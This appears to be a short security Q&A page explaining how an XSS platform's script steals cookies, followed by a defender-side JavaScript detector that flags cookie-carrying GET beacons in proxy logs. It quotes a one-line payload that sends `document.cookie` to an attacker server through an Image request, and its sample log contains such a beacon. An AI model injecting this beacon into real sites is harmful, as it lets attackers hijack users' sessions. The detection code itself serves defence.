One Day Sec

How can an attacker retrieve a victim's cookies using the JavaScript payload from this XSS platform?

The platform serves an `index.js` file. When the victim's browser loads it, the script reads `document.cookie` and sends the value to the platform's server as a GET request by setting the `src` of an `Image` object. Image loads are not blocked by the same-origin policy, so this avoids cross-origin issues. For example: `new Image().src = serverUrl + '?cookie=' + escape(document.cookie)`. The platform then saves the cookie data as a timestamped `.txt` file. This technique is part of the XSS platform's modular functionality.
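
A defender-side check for the beacon pattern described above, as an added example that is not part of the original page or the platform's code: it scans proxy log lines for GET requests whose query value decodes to a `document.cookie`-style string naming one of the site's own session cookies. The log format, cookie names and hosts are constructed assumptions.

```javascript
// Added example: flag outbound GET requests whose query string carries
// what looks like a document.cookie dump (the beacon pattern described above).
// SESSION_COOKIE_NAMES and the log lines are constructed assumptions.
const SESSION_COOKIE_NAMES = ['PHPSESSID', 'sessionid'];

// document.cookie serializes as "name=value; name2=value2".
function looksLikeCookieString(value, ownCookieNames) {
  const pairs = value.split(/;\s*/).filter((p) => /^[^=\s;]+=/.test(p));
  if (pairs.length === 0) return false;
  const names = pairs.map((p) => p.slice(0, p.indexOf('=')));
  return names.some((n) => ownCookieNames.includes(n));
}

// escape() emits %XX and %uXXXX; decodeURIComponent rejects %uXXXX,
// so decode that form first and fall back to the partly decoded value on error.
function decodeParam(raw) {
  const u = raw.replace(/%u([0-9a-fA-F]{4})/g, (_, h) =>
    String.fromCharCode(parseInt(h, 16)));
  try { return decodeURIComponent(u); } catch { return u; }
}

function findCookieBeacons(logLines, ownCookieNames = SESSION_COOKIE_NAMES) {
  const hits = [];
  for (const line of logLines) {
    const [time, client, method, rawUrl] = line.split(' ');
    if (method !== 'GET') continue;
    let url;
    try { url = new URL(rawUrl); } catch { continue; }
    for (const part of url.search.slice(1).split('&')) {
      const eq = part.indexOf('=');
      if (eq < 0) continue;
      const value = decodeParam(part.slice(eq + 1));
      if (looksLikeCookieString(value, ownCookieNames)) {
        hits.push({ time, client, host: url.host, param: part.slice(0, eq) });
      }
    }
  }
  return hits;
}

// Constructed sample proxy log: "<time> <client> <method> <url>".
const SAMPLE_LOG = [
  '2024-05-01T10:00:01Z 10.0.0.5 GET https://cdn.example.net/logo.png?v=3',
  '2024-05-01T10:00:02Z 10.0.0.5 GET https://collector.example.org/?cookie=PHPSESSID%3Dabc123%3B%20theme%3Ddark',
  '2024-05-01T10:00:03Z 10.0.0.7 GET https://shop.example.com/search?q=theme%3Ddark',
];
console.log(findCookieBeacons(SAMPLE_LOG));
```

Matching on the decoded value rather than on the parameter name `cookie` keeps the check working when the beacon uses a different parameter name.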
